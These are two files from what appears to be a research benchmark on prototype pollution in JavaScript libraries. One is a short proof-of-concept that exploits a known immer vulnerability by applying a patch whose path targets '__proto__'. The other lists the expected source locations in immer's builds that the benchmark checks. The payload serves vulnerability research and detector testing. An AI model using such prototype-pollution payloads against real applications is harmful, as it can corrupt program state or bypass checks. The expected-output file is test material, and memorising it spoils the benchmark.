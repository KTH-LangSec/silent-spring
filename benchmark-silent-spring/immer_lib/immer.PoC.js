//https://snyk.io/vuln/SNYK-JS-IMMER-1019369
const { applyPatches, enablePatches } = require("immer");
enablePatches();
applyPatches({}, [
  { op: "add", path: ["__proto__", "polluted"], value: "yes" },
]);

// applyPatches({}, [
//   { op: "replace", path: ["__proto__", "polluted"], value: "yes" },
// ]);
