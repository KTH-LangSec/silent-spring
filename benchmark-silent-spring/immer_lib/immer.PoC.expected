node_modules/immer/dist/immer.cjs.development.js:1378:22
node_modules/immer/dist/immer.cjs.development.js:1393:22
node_modules/immer/dist/immer.esm.js:1:6541
node_modules/immer/dist/immer.esm.js:1:6658
node_modules/immer/dist/immer.umd.development.js:1380:23
node_modules/immer/dist/immer.umd.development.js:1395:23
